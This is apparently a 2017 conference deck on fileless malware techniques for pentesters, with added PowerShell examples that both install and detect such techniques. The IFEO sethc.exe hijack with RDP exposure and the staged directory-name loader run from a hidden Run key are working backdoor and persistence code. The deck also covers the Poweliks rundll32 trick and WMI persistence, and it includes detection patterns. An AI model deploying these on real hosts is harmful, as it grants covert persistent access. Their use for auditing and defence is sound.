Page 1: FileLess Malware Infections

Malware tricks for Pentesters

Ramon Pinuaga

Bsides Lisbon 2017

Page 2: Index

1) Presentation

2) Real world examples

3) Process
• Infection
• Persistence

4) Conclusions

Page 3: PRESENTATION

Page 4: Who are you?

• Pentester for many, many years.

• Current position: Cybersecurity Audit Manager at PROSEGUR Spain.

• I prefer the offensive side of security.

Page 5: What is FileLess Malware?

• Malicious code that does not need to create or drop regular files on the system.

• A move away from the traditional monolithic malware binary or pentesting framework.

• For persistence we usually need to leave at least something on the system, but it can be hidden and made very small.

Page 6: Fileless Malware Infections
Page 7: FileLess or MalwareLess?

• There are two main ways to achieve an infection without files:

• Not using malware (or code) at all, e.g. planting a configuration-only backdoor on a system. We do not control the system all the time, but we can get back in later.

• Using code that never touches disk, at least not in clear form. For persistence we always need some way to keep at least the first stage of the code on the system.

Page 8: Why FileLess in pentesting?

• Evading antivirus detection: no file, no scan, no VirusTotal upload.

• Leaving a smaller forensic trail: fewer artifacts.

• Difficult environments (hard to upload things).

• Helps in bypassing application whitelisting (SRP, AppLocker, etc.).

Page 9: Fileless Malware Infections
Page 10: Pentest vs APT

• What an APT implant needs and a pentest usually does not:

• Long-term persistence.

• Kernel-level access.

• High-level hiding.

• What a pentest needs instead is quickness and simplicity: only userland, no rootkits, no NSA-like implants.

Page 11: DEMO: RDP + Sethc

• Enable remote desktop
• Hijack sethc.exe
• Change RDP port
• Open Windows firewall
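The four steps of this demo are all registry and firewall configuration, which is what makes it a "configuration-only" backdoor. The script below is an added example (it is not the talk's demo code): `Invoke-SethcRdpBackdoor` applies the four changes on a lab host, and `Get-AccessibilityBackdoorState` audits a host for them, checking every accessibility binary Winlogon launches from the logon screen rather than only sethc.exe. Port 3390, the firewall rule name and the function names are arbitrary choices.

```powershell
# Added example, not the talk's demo code. Run from an elevated PowerShell.

$Ifeo       = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$TermServer = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$RdpTcp     = "$TermServer\WinStations\RDP-Tcp"
# Accessibility binaries Winlogon starts on the secure desktop before anyone logs on.
$AccessibilityTools = 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe', 'magnify.exe', 'displayswitch.exe'

function Invoke-SethcRdpBackdoor {
    param([int]$Port = 3390)   # arbitrary non-default port

    # 1) Enable Remote Desktop: the same value the System control panel toggles.
    Set-ItemProperty -Path $TermServer -Name fDenyTSConnections -Value 0 -Type DWord

    # 2) Hijack sethc.exe with an IFEO "Debugger" value. The loader starts the
    #    debugger (cmd.exe) instead of Sticky Keys, so pressing Shift five times
    #    at the logon screen opens a SYSTEM shell. No binary on disk is replaced.
    $key = Join-Path $Ifeo 'sethc.exe'
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name Debugger -Value 'C:\Windows\System32\cmd.exe' -Type String

    # 3) Move RDP off 3389 so a scan for the default port does not find it.
    Set-ItemProperty -Path $RdpTcp -Name PortNumber -Value $Port -Type DWord

    # 4) Open the Windows firewall for the new port (rule name is arbitrary).
    netsh advfirewall firewall add rule name="Remote Desktop $Port" dir=in action=allow protocol=TCP localport=$Port | Out-Null

    # TermService reads PortNumber at start, so the port change needs a restart.
    Restart-Service -Name TermService -Force
}

function Get-AccessibilityBackdoorState {
    $hijacked = foreach ($exe in $AccessibilityTools) {
        $dbg = (Get-ItemProperty -Path (Join-Path $Ifeo $exe) -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) { [pscustomobject]@{ Image = $exe; Debugger = $dbg } }
    }
    $rdpOn = (Get-ItemProperty -Path $TermServer -Name fDenyTSConnections).fDenyTSConnections -eq 0
    $port  = (Get-ItemProperty -Path $RdpTcp -Name PortNumber).PortNumber
    # UserAuthentication=1 means Network Level Authentication: the logon screen,
    # and with it the Sticky Keys trick, is only reachable after a valid logon.
    $nla   = (Get-ItemProperty -Path $RdpTcp -Name UserAuthentication -ErrorAction SilentlyContinue).UserAuthentication
    [pscustomobject]@{
        HijackedImages = $hijacked        # none of these binaries has a legitimate debugger
        RdpEnabled     = $rdpOn
        RdpPort        = $port
        NonDefaultPort = ($port -ne 3389)
        NlaRequired    = ($nla -eq 1)
        BackdoorLikely = [bool]$hijacked -and $rdpOn
    }
}

# Audit: Get-AccessibilityBackdoorState | Format-List
```

Two caveats for anyone reproducing the demo or hunting for it. On Windows 8 / Server 2012 and later, RDP requires Network Level Authentication by default (`UserAuthentication=1` under RDP-Tcp), which means no logon screen and no Sticky Keys prompt until a valid account has authenticated; the demo as listed on the slide assumes NLA is off. And the audit is cheap because an IFEO `Debugger` value on any accessibility binary has no legitimate use, so it is a reliable indicator whatever port RDP listens on.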

Page 12: Fileless Malware Infections
Page 13: How to keep code without files?

• Keeping everything in memory. (Problem: no persistence.)

• Storing the code in non-file or non-regular storage (the classics):

• Outside the filesystem: UEFI, HDD firmware, hidden disk areas, $EA, etc. (We are not going that far, remember: only userland.)

• Network / external systems.

• Alternate Data Streams (ADS).

• Registry.

Page 14: Novel non-regular storage

• WMI (subscriptions).

• Windows events (.evt).

• Inside documents (.doc, .xls, .pdf).

• File/directory names (0-day, i.e. not previously published).

• Environment variables (more 0-day).

Page 15: DEMO: Code in filenames

• Stage 1: Run key
• Stage 2: Environment variable
• Stage 3: Directory names
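The three stages chain as follows: a Run value (stage 1) starts PowerShell and evaluates an environment variable; the variable (stage 2) holds a one-line loader; the loader reassembles the real script (stage 3) from directory names, so the script itself never exists as file content. The script below is an added example that lays out that chain with a harmless payload and reads stage 3 back; it is not the talk's demo code. `$StageRoot`, the variable name `APPX_CACHE_KEY`, the Run value name `FeedsCache`, the 120-character chunk size and the function names are arbitrary choices.

```powershell
# Added example, not the talk's demo code.

$StageRoot = Join-Path $env:LOCALAPPDATA 'Microsoft\Feeds\Cache'   # arbitrary, chosen to look boring
$EnvName   = 'APPX_CACHE_KEY'                                      # arbitrary user environment variable
$RunName   = 'FeedsCache'                                          # arbitrary HKCU Run value name
$RunKey    = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$ChunkSize = 120   # keeps each path well under 260 characters with a 4-character index prefix

function Install-DirNameStage {
    param([Parameter(Mandatory)][string]$Script)

    # Stage 3: the script exists only as directory names. Base64 keeps it to
    # legal name characters except '/', which is swapped for '-' ('-' is not in
    # the Base64 alphabet, so the swap is reversible). Each name gets an index.
    $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script)).Replace('/', '-')
    New-Item -Path $StageRoot -ItemType Directory -Force | Out-Null
    $i = 0
    for ($pos = 0; $pos -lt $b64.Length; $pos += $ChunkSize) {
        $chunk = $b64.Substring($pos, [Math]::Min($ChunkSize, $b64.Length - $pos))
        New-Item -Path (Join-Path $StageRoot ('{0:D3}_{1}' -f $i, $chunk)) -ItemType Directory -Force | Out-Null
        $i++
    }

    # Stage 2: a one-line loader kept in a user environment variable (HKCU\Environment).
    # It sorts the directory names, strips the index, restores '/', decodes and runs.
    $loader = "`$c=-join (Get-ChildItem -Directory '$StageRoot'|Sort-Object Name|ForEach-Object{`$_.Name.Substring(4)});" +
              "iex([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(`$c.Replace('-','/'))))"
    [Environment]::SetEnvironmentVariable($EnvName, $loader, 'User')

    # Stage 1: the only autostart artifact, a Run value that evaluates the variable.
    Set-ItemProperty -Path $RunKey -Name $RunName -Value "powershell.exe -w hidden -nop -c `"iex `$env:$EnvName`""
}

function Get-DirNameStage {
    # Reassemble stage 3 without executing it, for verification or triage.
    $c = -join (Get-ChildItem -Directory $StageRoot | Sort-Object Name | ForEach-Object { $_.Name.Substring(4) })
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($c.Replace('-', '/')))
}

function Uninstall-DirNameStage {
    Remove-ItemProperty -Path $RunKey -Name $RunName -ErrorAction SilentlyContinue
    [Environment]::SetEnvironmentVariable($EnvName, $null, 'User')
    Remove-Item -Path $StageRoot -Recurse -Force -ErrorAction SilentlyContinue
}

# Lab use with a harmless stage 3:
# Install-DirNameStage -Script 'Add-Type -AssemblyName PresentationFramework; [Windows.MessageBox]::Show("stage 3 ran from directory names") | Out-Null'
# Get-DirNameStage      # returns the script text without running it
# Uninstall-DirNameStage
```

What survives on disk is an empty directory tree and two registry values; no file content carries the payload. The trade-off the talk points at is visible in stage 1: a hidden-window `powershell.exe -c "iex $env:..."` in a Run key is exactly what command-line auditing and autoruns tooling surface, so the storage trick hides the code, not the launcher.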

Page 16: Fileless Malware Infections
Page 17: How to execute code without files?

• Remote injection in memory -> remote call or exploit.

• Loading remote binaries (EXEs, DLLs) -> via SMB, WebDAV, etc.

• Scripting languages -> loaded remotely or from the command line:

• PowerShell (powershell.exe).

• JavaScript/VBScript (cscript.exe, wscript.exe, mshta.exe, rundll32.exe, regsvr32.exe).

• .NET assemblies (InstallUtil.exe, IEExec.exe, RegAsm.exe).

Page 18: Our FileLess pentest framework

• Tools already installed on the system (no new files).

• Tools that accept external input (via the command line or the network).

• Bonus: tools signed by Microsoft.

Page 19: REAL WORLD EXAMPLES

Page 20: Real world examples

• Worms (memory only): Slammer.

• Poweliks.

• WMIGhost.

• Empire.

• Duqu 2.0 (Kaspersky).

Page 21: Slammer (2003)

• Worm that infected tens of thousands of hosts within minutes and degraded general Internet traffic in some areas.

• It exploited a stack buffer overflow in the Microsoft SQL Server 2000 Resolution Service (1434/UDP, MS02-039).

• Only 376 bytes, so it fitted into a single UDP packet and ran entirely from the exploited process's memory.

Page 22: Poweliks (2014)

• Infection via Word macro (not FileLess).

• Persistence via an autostart registry key (HKLM\Software\Microsoft\Windows\CurrentVersion\Run).

• Minimal first stage: uses a clever rundll32 trick to run JavaScript code.

• The next stages are also stored in the registry (encoded) and run PowerShell code.

• PowerShell injects a DLL into another process's memory, without touching disk.

Page 23: Poweliks – Rundll32 trick

• The Run value starts rundll32.exe with a javascript: URL where a DLL name is expected: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";<script>. rundll32 splits at the comma, LoadLibrary resolves the mangled module name to mshtml.dll, and the RunHTMLApplication export treats the command line as a javascript: URL and evaluates the script after the semicolon, which reads the encoded next stage back out of the registry.

Page 24: WMIghost (2014)

• Infection via Word macro.

• The dropper and UAC bypass binaries touch disk (not fully FileLess).

• It then registers the permanent WMI objects it needs: an event filter, an event consumer and the filter-to-consumer binding.

• The payload is JavaScript carried in the event consumer (an ActiveScriptEventConsumer).
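A permanent WMI subscription is three objects in `root\subscription`: a `__EventFilter` (the WQL trigger), an `__EventConsumer` subclass (what runs) and a `__FilterToConsumerBinding` tying them together. The script below is an added example, not code from the talk or from WMIghost: it joins the three objects back together so an analyst sees trigger and payload side by side, and removes a named subscription. It uses `Get-WmiObject`, whose binding properties are plain object-path strings, so it targets Windows PowerShell 5.1 as found on a 2017-era host; the object names in the usage line are placeholders.

```powershell
# Added example, not from the talk.

$SubNs = 'root\subscription'

function Get-WmiPersistence {
    $filters = @{}; $consumers = @{}
    Get-WmiObject -Namespace $SubNs -Class __EventFilter   | ForEach-Object { $filters[$_.Name]   = $_ }
    # Querying the abstract base class returns every consumer subclass instance.
    Get-WmiObject -Namespace $SubNs -Class __EventConsumer | ForEach-Object { $consumers[$_.Name] = $_ }

    foreach ($b in Get-WmiObject -Namespace $SubNs -Class __FilterToConsumerBinding) {
        # Binding references are object paths such as: __EventFilter.Name="BotFilter82"
        $fName = if ($b.Filter   -match 'Name="([^"]+)"') { $Matches[1] }
        $cName = if ($b.Consumer -match 'Name="([^"]+)"') { $Matches[1] }
        $f = if ($fName) { $filters[$fName] }
        $c = if ($cName) { $consumers[$cName] }
        $payload = switch ($c.__CLASS) {
            'CommandLineEventConsumer'  { $c.CommandLineTemplate }
            'ActiveScriptEventConsumer' {
                $body = if ($c.ScriptText) { $c.ScriptText } else { "file: $($c.ScriptFileName)" }
                "[$($c.ScriptingEngine)] $body"
            }
            default { $null }
        }
        [pscustomobject]@{
            Filter       = $fName
            Query        = $f.Query          # e.g. a __InstanceModificationEvent timer or a logon trigger
            ConsumerType = $c.__CLASS
            Consumer     = $cName
            Payload      = $payload
            # Script or command consumers are the WMIghost/Empire pattern; the
            # built-in NTEventLogEventConsumer bindings on a stock host are not.
            Suspicious   = ($c.__CLASS -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer')
        }
    }
}

function Remove-WmiPersistence {
    param([Parameter(Mandatory)][string]$Filter, [Parameter(Mandatory)][string]$Consumer)
    $fPat = 'Name="' + [regex]::Escape($Filter)   + '"'
    $cPat = 'Name="' + [regex]::Escape($Consumer) + '"'
    # Remove the binding first; filter and consumer are independent objects.
    Get-WmiObject -Namespace $SubNs -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -match $fPat -and $_.Consumer -match $cPat } | Remove-WmiObject
    Get-WmiObject -Namespace $SubNs -Class __EventConsumer | Where-Object { $_.Name -eq $Consumer } | Remove-WmiObject
    Get-WmiObject -Namespace $SubNs -Class __EventFilter   | Where-Object { $_.Name -eq $Filter }   | Remove-WmiObject
}

# Triage:  Get-WmiPersistence | Where-Object Suspicious | Format-List
# Cleanup: Remove-WmiPersistence -Filter 'BotFilter82' -Consumer 'BotConsumer23'   # placeholder names
```

Expect one legitimate entry on a stock Windows install (the "SCM Event Log" filter bound to an `NTEventLogEventConsumer`), which is why the `Suspicious` flag keys on consumer type rather than on the mere presence of a binding. Reading the objects requires administrator rights; creating them, which is what the malware does after its UAC bypass, requires the same.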

Page 25: Empire (2015)

• PowerShell-based RAT.

• Tries to be as FileLess as possible.

• Works mostly from memory only.

• Various options for persistent storage: registry, ADS, event log and of course WMI subscriptions.

Page 26: Duqu 2.0 (2015)

• Unknown infection vector.

• Only a few selected hosts were used for on-disk persistence.

• Those hosts injected the malware remotely into the memory of other systems.

• For this task the malware used domain administrator privileges to deploy MSI packages (via a new service or a scheduled task).

Page 27: Fileless Malware Infections
Page 28: Common FileLess behavior

• First stage: minimal. Usually a small VBS or JS launcher (not PowerShell directly).

• Second stage: the main script, PowerShell-based. More complex and powerful logic that injects a binary into another process.

• Third stage: a binary, usually a PE DLL payload. Closer to traditional malware, but it never touches disk.

Page 29: PROCESS

Page 30: Operation Process

• An ideal FileLess pentest operation covers the following phases:

1. FileLess infection.

2. Installation of FileLess backdoors.

3. Gaining FileLess persistence.

Page 31: FileLess Infection

• Infection without sending any files.

• Not common. Even known FileLess APT operations use some kind of file in this stage.

• Preferably, deliver the exploit before the application layer (no document or attachment that gets saved to disk):

• Inside a stream.

• At the lower network layers (e.g. SMB or SSL exploits).

• Against open network services (e.g. EternalBlue).

Page 32: FileLess Backdoors

• Configuration-only backdoors (no code).

• Some popular ones:

• Create user + remote exec (PsExec/sc, WMI, schtasks, WinRM, PSRemoting).

• Binary image hijack + Remote Desktop.

• Silver/Golden tickets.

• Proxy + decreased security.

Page 33: Fileless Malware Infections
Page 34: FileLess persistence

• First stage: registry autostart entries.

• Run entries.

• Scheduled tasks.

• Image hijacks.

• WMI.

• Services (not very elegant).

• Usually too noisy for a human analyst, but harder to detect with automated tools because no file is involved. Note that no file does not mean no telemetry: command-line auditing and PowerShell script block logging still record the launcher and whatever it evaluates.
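Since the first stage has to live somewhere an automated tool can enumerate, the practical check is to pull every autostart entry and match it against the script-host launchers from the "How to execute code without files" slide. The script below is an added example, not from the talk: it reads the Run/RunOnce values and scheduled-task actions listed on this slide, plus the user and machine environment variables used as stage-2 storage in the filenames demo, flags anything that looks like a script-host launcher (including the Poweliks `rundll32 javascript:` form), and decodes `-EncodedCommand` payloads so the analyst sees the real command. The regular expressions are my heuristics, not a vendor signature set; every hit needs a human look.

```powershell
# Added example, not from the talk. Run as an administrator to see HKLM and Machine scope.

$LauncherPatterns = @(
    'rundll32(\.exe)?\s+javascript:',                  # Poweliks: mshtml RunHTMLApplication loader
    'mshta(\.exe)?\s',                                 # HTA, or inline vbscript:/javascript:
    'regsvr32(\.exe)?\s.*[/-]i:',                      # scriptlet (.sct) via /i:<url>
    '(cscript|wscript)(\.exe)?\s',
    'powershell(\.exe)?\s.*-(e|ec|enc|encodedcommand)\s',
    'powershell(\.exe)?\s.*\$env:',                    # stage 1 pulling stage 2 out of the environment
    '(installutil|ieexec|regasm)(\.exe)?\s',
    '\biex\b|invoke-expression'                        # loader text itself, e.g. inside a variable value
)

function ConvertFrom-EncodedCommand {
    param([string]$CommandLine)
    # -EncodedCommand carries UTF-16LE Base64; return the decoded script or $null.
    if ($CommandLine -match '-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) } catch { }
    }
    return $null
}

function Test-LauncherPattern {
    param([string]$Text)
    foreach ($p in $LauncherPatterns) { if ($Text -imatch $p) { return $p } }
    return $null
}

function Get-FilelessAutostarts {
    $hits = New-Object System.Collections.Generic.List[object]
    $record = {
        param($Source, $Name, $Text)
        $p = Test-LauncherPattern $Text
        if ($p) {
            $hits.Add([pscustomobject]@{ Source = $Source; Name = $Name; Pattern = $p
                                         Command = $Text; Decoded = (ConvertFrom-EncodedCommand $Text) })
        }
    }
    # Registry autostart values (the stage-1 location Poweliks and the filenames demo use).
    $providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($key in 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
                     'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
                     'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                     'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce') {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($v in $props.PSObject.Properties) {
            if ($v.Name -notin $providerProps) { & $record $key $v.Name ([string]$v.Value) }
        }
    }
    # Scheduled tasks: program plus arguments of every exec action.
    foreach ($t in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($a in $t.Actions) {
            if ($a.Execute) { & $record 'ScheduledTask' ($t.TaskPath + $t.TaskName) "$($a.Execute) $($a.Arguments)" }
        }
    }
    # Environment variables as stage-2 storage: the value is what matters, not the name.
    foreach ($scope in 'User', 'Machine') {
        $vars = [Environment]::GetEnvironmentVariables($scope)
        foreach ($k in $vars.Keys) { & $record "Env:$scope" $k ([string]$vars[$k]) }
    }
    return $hits
}

# Usage: Get-FilelessAutostarts | Format-List
```

The `Decoded` column is the useful part: an encoded PowerShell launcher is opaque in an autoruns listing, but once decoded it usually names the next storage location (a registry value, an ADS, a directory) that the talk's later stages live in. Image hijacks and WMI are deliberately left out here; the IFEO check belongs with the Sethc demo and the WMI enumeration with the WMIghost slide, since each needs its own data source.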

Page 35: CONCLUSIONS

Page 36: Conclusions

• Full pentest operations are possible without using any files (or almost).

• We need some "resident" artifacts on the system, but these can be very small and easily hidden.

Page 37: Thanks

• Questions? Comments?

• https://twitter.com/rpinuaga

Page 38: Previous research

• A lot of ideas taken from:

• Casey Smith: https://twitter.com/subtee

• Didier Stevens: https://twitter.com/DidierStevens

• Alex Abramov: https://twitter.com/codereversing

• Rob Fuller: https://twitter.com/mubix

• Cneelis: https://twitter.com/Cneelis

• Matt Nelson: https://twitter.com/enigma0x3

• Matt Graeber: https://twitter.com/mattifestation

• James Forshaw: https://twitter.com/tiraniddo

Page 39: www.prosegur.com

Page 40: DEMO: Proxy + Authenticode

• Convince the user to execute a .REG file
• Configure proxy
• Disable Authenticode validation
• Wait for an EXE download
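This is the "Proxy + decreased security" backdoor from the FileLess Backdoors slide: nothing executes on the victim, a .REG import merely points the user's HTTP traffic at a proxy and turns off the checks that would complain when the proxy swaps a downloaded EXE. The script below is an added example, not from the talk: it parses a .REG file offline, so a suspicious file can be triaged before anyone imports it, and flags the values such a file would need to change. The slide does not name the registry keys; the watch list is my reading of the demo (the user's Internet Settings proxy values and the Internet Explorer `CheckExeSignatures` / `RunInvalidSignatures` download options), the parser handles string, dword and delete entries only, and the sample .REG text, including the proxy host, is constructed.

```powershell
# Added example, not from the talk.

function ConvertFrom-RegFile {
    param([Parameter(Mandatory)][string]$Text)
    $key = $null
    foreach ($line in $Text -split "`r?`n") {
        $line = $line.Trim()
        if ($line -match '^\[-?(.+)\]$') { $key = $Matches[1]; continue }      # [KEY] or [-KEY] (delete key)
        if (-not $key -or $line -eq '' -or $line.StartsWith(';')) { continue }
        if ($line -match '^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$') {
            $name = if ($Matches[1]) { $Matches[1] } else { '(Default)' }
            $raw  = $Matches[2]
            $value = switch -Regex ($raw) {
                '^dword:([0-9a-fA-F]{8})$' { [Convert]::ToInt64($Matches[1], 16); break }
                '^"(.*)"$'                 { [regex]::Replace($Matches[1], '\\(.)', '$1'); break }   # unescape \\ and \"
                '^-$'                      { $null; break }                                         # value deletion
                default                    { $raw }                                                 # hex:, hex(2):, ... kept raw
            }
            [pscustomobject]@{ Key = $key; Name = $name; Value = $value }
        }
    }
}

function Find-RegFileRisks {
    param([Parameter(Mandatory)][string]$Text)
    # Watch list: my reading of what the demo's .REG file has to set.
    $watch = @(
        @{ Key = 'CurrentVersion\\Internet Settings$'; Name = 'ProxyEnable';          Bad = { $args[0] -eq 1 };         Why = 'system proxy switched on' },
        @{ Key = 'CurrentVersion\\Internet Settings$'; Name = 'ProxyServer';          Bad = { [bool]$args[0] };         Why = 'HTTP(S) traffic routed through a proxy' },
        @{ Key = 'CurrentVersion\\Internet Settings$'; Name = 'AutoConfigURL';        Bad = { [bool]$args[0] };         Why = 'proxy chosen by a remote PAC script' },
        @{ Key = 'Internet Explorer\\Download$';        Name = 'CheckExeSignatures';   Bad = { "$($args[0])" -eq 'no' }; Why = 'signature check on downloaded programs off' },
        @{ Key = 'Internet Explorer\\Download$';        Name = 'RunInvalidSignatures'; Bad = { $args[0] -eq 1 };         Why = 'programs with invalid signatures may run' }
    )
    foreach ($e in ConvertFrom-RegFile -Text $Text) {
        foreach ($w in $watch) {
            if ($e.Key -match $w.Key -and $e.Name -eq $w.Name -and (& $w.Bad $e.Value)) {
                [pscustomobject]@{ Key = $e.Key; Name = $e.Name; Value = $e.Value; Why = $w.Why }
            }
        }
    }
}

# Constructed sample of what a file for the demo could look like (proxy host is a placeholder).
$SampleReg = @'
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable"=dword:00000001
"ProxyServer"="proxy.example.net:8080"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download]
"CheckExeSignatures"="no"
"RunInvalidSignatures"=dword:00000001
'@

Find-RegFileRisks -Text $SampleReg | Format-Table -AutoSize
```

Everything the file touches is under HKEY_CURRENT_USER, which is the point of the social-engineering step: a standard user can import it without a UAC prompt, and a later `reg export` of those two keys is all a responder needs to confirm the change. The same `Find-RegFileRisks` check can be run on mail-gateway quarantine or on .REG files found in a user's Downloads folder.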

